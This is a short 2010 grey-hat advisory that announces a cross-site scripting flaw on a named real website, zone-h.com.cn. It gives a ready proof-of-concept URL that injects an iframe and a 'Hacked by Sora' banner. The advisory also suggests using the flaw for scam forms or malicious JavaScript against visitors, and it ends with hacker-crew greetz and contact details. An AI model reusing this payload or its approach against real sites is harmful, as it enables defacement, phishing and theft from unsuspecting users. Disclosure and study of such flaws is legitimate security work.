.__
____________   ____   ____           |  |__               ____   ____
\___   /  _ \ /    \_/ __ \   ______ |  |  \    ______  _/ ___\ /    \
/    (  <_> )   |  \  ___/  /_____/ |   Y  \  /_____/  \  \___|   |  \
/_____ \____/|___|  /\___  >         |___|  /            \___  >___|  /
\/          \/     \/               \/                 \/     \/
> Cross Site Scripting Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/

————————
1. INFORMATION         |
————————
Site: http://www.zone-h.com.cn/
Vulnerability: Cross Site Scripting
Vulnerability Level: 3

————————
2. DESCRIPTION         |
————————
http://www.zone-h.com.cn/ suffers from a cross site scripting vulnerability. This vulnerability can be exploited in many ways.
An example is creating a form to scam other people, or to execute malicious javascript code on the victim’s computer.

————————
3. PROOF OF CONCEPT    |
————————

HTML Code:

http://www.zone-h.com.cn/index.php?key=%3Ciframe+src%3D%22http%3A%2F%2Fwww.greyhathackers.wordpress.com%2F%22%3E%3Ch2%3E%3Ccenter%3EHacked+by+Sora+-+vhr95zw+[at]+hotmail+[dot]+com%3C%2Fcenter%3E%3C%2Fh2%3E&mode=user&Submit=+Search+

————————-
4. GREETZ               |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #

————————-
5. CONTACT              |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com

<c> 2010 – http://greyhathackers.wordpress.com – Sora